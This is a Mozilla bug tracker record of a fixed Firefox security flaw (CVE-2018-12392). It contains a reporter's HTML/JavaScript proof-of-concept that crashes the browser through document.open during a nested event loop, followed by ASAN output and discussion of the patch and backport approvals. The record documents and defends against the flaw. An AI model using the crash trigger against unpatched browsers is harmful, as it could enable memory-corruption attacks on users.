Closed
Bug 1492823
(CVE-2018-12392)
Opened 6 years ago
Closed 6 years ago
js::AssertSameCompartment failure in nsHTMLDocument::Open
Categories
(Core :: DOM: Core & HTML, defect, P1)
Tracking
()
VERIFIED
FIXED
mozilla64
People
(Reporter: nils, Assigned: smaug)
Details
(Keywords: csectype-uaf, reporter-external, sec-high, Whiteboard: [post-critsmash-triage][adv-main63+][adv-esr60.3+])
Attachments
(5 files)
|
639 bytes,
text/html
|
Details | |
|
21.89 KB,
text/plain
|
Details | |
|
656 bytes,
text/html
|
Details | |
|
2.99 KB,
patch
|
peterv
:
review+
RyanVM
:
approval-mozilla-beta+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
|
4.39 KB,
patch
|
peterv
:
review+
RyanVM
:
approval-mozilla-esr60+
|
Details | Diff | Splinter Review |
The following testcase crashes the lates ASAN build of Firefox 64.0a1 (BuildID=20180919100043). It looks like we have to win a race to trigger the issue, so it might require a few reloads/restarts.
<script>
function spin() {
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try{x.send("X");}catch(e){}
}
function start() {
reloadurl = location.href;
o707=window.document;
o715=new WebSocket("ws://0.0.0.0");
o731=o707.createElement('template');
o707.onfocus=fun1;
o715.onerror=fun0;
spin();
}
function fun0() {
o707.writeln("x");
}
function fun1() {
x=o731.content;
o707.execCommand('subscript',false,null);
o707.open();
window.top.setTimeout("window.top.location.href='"+reloadurl+"'",400);;
}
</script>
<body onload="start()"></body>
ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28511==ERROR: AddressSanitizer: ILL on unknown address 0x55b844692b1f (pc 0x55b844692b1f bp 0x7ffd03e5ea70 sp 0x7ffd03e5e900 T0)
#0 0x55b844692b1e in MOZ_CrashPrintf /builds/worker/workspace/build/src/mfbt/Assertions.cpp
#1 0x7eff42067828 in fail /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:52:9
#2 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:68
#3 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:82
#4 0x7eff42067828 in checkImpl<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:194
#5 0x7eff42067828 in check<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:203
#6 0x7eff42067828 in js::AssertSameCompartment(JSContext*, JSObject*) /builds/worker/workspace/build/src/js/src/jsfriendapi.cpp:418
#7 0x7eff3a1724dd in mozilla::dom::ReparentWrapper(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2279:3
#8 0x7eff3aeb9ee3 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1532:11
#9 0x7eff39b73a75 in mozilla::dom::HTMLDocument_Binding::open(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:215:53
#10 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
#11 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
#12 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
#13 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
#14 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
#15 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
#16 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
#17 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
#18 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
#19 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
#20 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#21 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
#22 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
#23 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
#24 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
#25 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
#26 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
#27 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
#28 0x7eff3727d8e1 in FocusBlurEvent::Run() /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2077:12
#29 0x7eff36c18186 in AddScriptRunner /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5674:13
#30 0x7eff36c18186 in nsContentUtils::AddScriptRunner(nsIRunnable*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5681
#31 0x7eff371bb3e3 in nsFocusManager::FireFocusOrBlurEvent(mozilla::EventMessage, nsIPresShell*, nsISupports*, bool, bool, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2250:5
#32 0x7eff371ba714 in nsFocusManager::FireDelayedEvents(nsIDocument*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1081:9
#33 0x7eff3714d537 in FireOrClearDelayedEvents(nsTArray<nsCOMPtr<nsIDocument> >&, bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9016:11
#34 0x7eff3714cd10 in nsIDocument::UnsuppressEventHandlingAndFireEvents(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9332:5
#35 0x7eff36cca940 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1211:13
#36 0x7eff36d4a455 in nsGlobalWindowOuter::SetNewDocument(nsIDocument*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:1973:19
#37 0x7eff3aeb9b20 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1498:22
#38 0x7eff3aebebb4 in nsHTMLDocument::WriteCommon(JSContext*, nsTSubstring<char16_t> const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1768:38
#39 0x7eff3aebdc20 in nsHTMLDocument::WriteCommon(JSContext*, mozilla::dom::Sequence<nsTString<char16_t> > const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1686:5
#40 0x7eff39b77c81 in mozilla::dom::HTMLDocument_Binding::writeln(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:421:9
#41 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
#42 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
#43 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
#44 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
#45 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
#46 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
#47 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
#48 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
#49 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
#50 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
#51 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#52 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
#53 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
#54 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
#55 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
#56 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
#57 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
#58 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
#59 0x7eff3a991ea6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
#60 0x7eff3a945dc0 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:185:5
#61 0x7eff3a9ba039 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:213:13
#62 0x7eff3ca34422 in mozilla::dom::WebSocket::CreateAndDispatchSimpleEvent(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1955:3
#63 0x7eff3ca434c9 in mozilla::dom::WebSocketImpl::DispatchConnectionCloseEvents() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1920:18
#64 0x7eff3ca47bb7 in mozilla::dom::CallDispatchConnectionCloseEvents::Run() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:262:21
#65 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
#66 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
#67 0x7eff3c927bb2 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:334:25
#68 0x7eff3c927bb2 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937
#69 0x7eff3c925b80 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2768:11
#70 0x7eff39412c7f in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1277:9
#71 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
#72 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
#73 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
#74 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
#75 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
#76 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
#77 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
#78 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
#79 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
#80 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
#81 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#82 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
#83 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
#84 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
#85 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
#86 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
#87 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
#88 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
#89 0x7eff3d5cbed8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
#90 0x7eff40438f83 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7089:21
#91 0x7eff40433ff7 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6882:7
#92 0x7eff4043d447 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
#93 0x7eff357eddd5 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
#94 0x7eff357ec9bc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
#95 0x7eff357e84a9 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
#96 0x7eff357ead82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
#97 0x7eff357ec4e4 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
#98 0x7eff331cc492 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#99 0x7eff37141107 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8471:18
#100 0x7eff37141107 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8393
#101 0x7eff3711adfb in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5252:3
#102 0x7eff372871cb in applyImpl<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1178:12
#103 0x7eff372871cb in apply<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1184
#104 0x7eff372871cb in mozilla::detail::RunnableMethodImpl<nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1229
#105 0x7eff32f0e3e5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
#106 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
#107 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
#108 0x7eff3415ec33 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#109 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
#110 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
#111 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
#112 0x7eff3cd4d5a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#113 0x7eff411dedde in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:939:22
#114 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
#115 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
#116 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
#117 0x7eff411ddf03 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:765:34
#118 0x55b84461fb91 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
#119 0x55b84461fb91 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
#120 0x7eff550bdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#121 0x55b84454ef3c in _start (/home/nils/fuzzer3/firefox/firefox+0x2cf3c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ILL /builds/worker/workspace/build/src/mfbt/Assertions.cpp in MOZ_CrashPrintf
==28511==ABORTING
|
||
Comment 2•6 years ago
|
||
compartment mismatch during wrapper reparenting
Group: core-security → dom-core-security
Keywords: csectype-uaf,
sec-high
|
||
Comment 3•6 years ago
|
||
Jason, can you see if there could be something that needs fixing in XHR/Web Sockets here?
Component: DOM: Core & HTML → DOM: Networking
Flags: needinfo?(jduell.mcbugs)
Priority: -- → P1
|
||
Comment 4•6 years ago
|
||
I think this is unlikely to be related to XHR. The reason XHR is on the stack is that that's one of the ways that web content can trigger a nested event loop (which is presumably part of the issue here). We need somebody familiar with XPConnect / dom bindings to investigate.
Flags: needinfo?(jduell.mcbugs) → needinfo?(overholt)
|
Assignee | |
Updated•6 years ago
|
Assignee: nobody → bugs
Component: DOM: Networking → DOM
|
|
Assignee | |
Comment 5•6 years ago
|
||
Nothing to do with XPConnect or dom bindings either ;)
This is about document.open and replacing inner window and such.
|
|
Assignee | |
Comment 6•6 years ago
|
||
This seems to crash pretty reliably even on debug build (non-asan), at least when loaded from a local file.
|
|
Assignee | |
Comment 7•6 years ago
|
||
oh, this is a bit more fun than I thought. This is about template's document, and
related to https://bugzilla.mozilla.org/show_bug.cgi?id=1022869
|
|
Assignee | |
Comment 8•6 years ago
|
||
We need at least this. Fixes the crash.
I will file a new bug about other issues
Attachment #9012513 -
Flags: review?(peterv)
|
|
||
Updated•6 years ago
|
Flags: needinfo?(overholt)
|
||
Comment 9•6 years ago
|
||
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
Review of attachment 9012513 [details] [diff] [review]:
-----------------------------------------------------------------
::: dom/base/nsGlobalWindowInner.cpp
@@ +1148,5 @@
> }
> }
>
> void
> +nsGlobalWindowInner::FreeInnerObjects(bool aForDocumentOpen)
Maybe name this aUnsuppressEventHandling (reversing the values of course)?
Attachment #9012513 -
Flags: review?(peterv) → review+
|
|
Assignee | |
Comment 10•6 years ago
|
||
I actually wanted to use aForDocumentOpen since I expect that other might need it too.
And it is, IMO, easier to understand why such special case is happening.
|
|
Assignee | |
Comment 11•6 years ago
|
||
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
The patch does pin point to the issue, and actually, constructing at least a crash should be somewhat easy.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be something like
-m "Bug 1492823, ensure user input suppression works correctly even after document.open, r=peterv"
Which older supported branches are affected by this flaw?
all
If not all supported branches, which bug introduced the flaw?
see above. (I think this has been an issue at least since bug 946641, FF28)
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Looks like esr60 might need a separate patch, since bug 1451913 is the one which added handleDocumentOpen variable.
How likely is this patch to cause regressions; how much testing does it need?
I'd say rather unlikely to cause regressions. One needs to have document.open running inside sync xhr or so.
Attachment #9012513 -
Flags: sec-approval?
|
|
||
Updated•6 years ago
|
status-firefox62:
--- → affected
status-firefox63:
--- → affected
status-firefox-esr60:
--- → affected
|
||
Comment 12•6 years ago
|
||
We only have two betas left. This bug will need release management approval, so we can backport to affected branches, before I can give sec-approval.
Ritu?
tracking-firefox63:
--- → +
tracking-firefox64:
--- → +
tracking-firefox-esr60:
--- → 63+
Flags: needinfo?(rkothari)
|
|
||
Comment 14•6 years ago
|
||
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
sec-approval+ for trunk.
Can we get a beta and ESR60 patch made and nominated as well, to land after trunk?
Flags: needinfo?(abillings)
Attachment #9012513 -
Flags: sec-approval? → sec-approval+
|
|
Assignee | |
Comment 15•6 years ago
|
||
the patch applies to beta just fine.
|
|
Assignee | |
Comment 16•6 years ago
|
||
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
[Beta/Release Uplift Approval Request]
Feature/Bug causing the regression: None
User impact if declined:
Is this code covered by automated tests?: No
Has the fix been verified in Nightly?: Yes
Needs manual test from QE?: Yes
If yes, steps to reproduce: See comment 0
List of other uplifts needed: None
Risk to taking this patch: Low
Why is the change risky/not risky? (and alternatives if risky):
String changes made/needed: NA
Attachment #9012513 -
Flags: approval-mozilla-beta?
|
|
Assignee | |
Comment 17•6 years ago
|
||
Hmm, I'm having trouble to reproduce in esr60, but I can't see why this wouldn't happen there.
Will upload a patch.
|
|
Assignee | |
Comment 18•6 years ago
|
||
same for esr60, but this needs handleDocumentOpen
from https://bug1451913.bmoattachments.org/attachment.cgi?id=8967455
Attachment #9015291 -
Flags: review?(peterv)
|
||
Comment 19•6 years ago
|
||
|
||
Comment 20•6 years ago
|
||
Group: dom-core-security → core-security-release
Status: NEW → RESOLVED
